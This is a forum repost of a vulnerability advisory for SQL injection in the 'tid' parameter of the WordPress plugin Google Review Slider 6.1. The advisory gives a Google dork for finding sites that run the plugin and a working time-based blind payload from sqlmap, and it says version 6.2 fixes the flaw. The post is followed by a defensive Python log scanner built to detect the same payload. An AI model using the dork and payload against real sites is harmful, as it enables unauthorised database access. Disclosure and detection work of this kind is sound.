Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection

Thread started by KaliBot in the 'Web Application Exploits' forum on 31 October 2019

  1. KaliBot

    Code:
    # Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
    # Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
    # Date: 2019-07-02
    # Exploit Author: Princy Edward
    # Exploit Author Blog : https://prinyedward.blogspot.com/
    # Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
    # Version: 6.1
    # Tested on: Apache/2.2.24 (CentOS)
    # CVE :
    
    #POC :
    
    GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1
    
    #SQLMAP Result :
    sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
    ---
    Parameter: tid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
    
    # Changeset:
    # Issue fixed in version 6.2
    # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=
    
    Cheers!
    PrincyEdward
     
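A defender-side check for the request described in the post, as an added example that is not part of the original post or the plugin's code: it scans web access logs for requests to the plugin's template page whose `tid` value is not a plain integer. It assumes combined-format access logs and that `tid` is a numeric template ID; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP and request target from an Apache/nginx "combined" log entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "wp_google-templates_posts"  # value of page= in the advisory's request
INT_RE = re.compile(r"\d{1,10}")           # assumption: tid is a numeric template ID


def suspicious_tid(line):
    """Return (client_ip, decoded_tid) when the plugin page is requested
    with a tid that is not a plain integer; otherwise return None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs URL-decodes values, so %20 and + are seen as spaces.
    params = parse_qs(url.query, keep_blank_values=True)
    if PLUGIN_PAGE not in params.get("page", []):
        return None
    for tid in params.get("tid", []):
        if not INT_RE.fullmatch(tid.strip()):
            return m.group("ip"), tid
    return None


def scan(lines):
    """Return every (client_ip, decoded_tid) hit found in the log lines."""
    return [hit for hit in map(suspicious_tid, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - admin [02/Jul/2019:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=wp_google-templates_posts&tid=1&_wpnonce=abc&taction=edit HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Jul/2019:10:00:05 +0000] "GET /wp-admin/admin.php'
    '?page=wp_google-templates_posts&tid=1%20AND%20(SELECT%205357%20FROM%20'
    '(SELECT(SLEEP(5)))kHQz)&_wpnonce=abc&taction=edit HTTP/1.1" 200 5120',
    '198.51.100.7 - admin [02/Jul/2019:10:00:09 +0000] "GET /wp-admin/admin.php'
    '?page=other-plugin&tid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, tid in scan(SAMPLE_LOG):
        print(f"non-integer tid from {ip}: {tid!r}")
```

Hits on sites still running version 6.1 are worth correlating with slow responses on the same request, since the technique sqlmap reported is time-based.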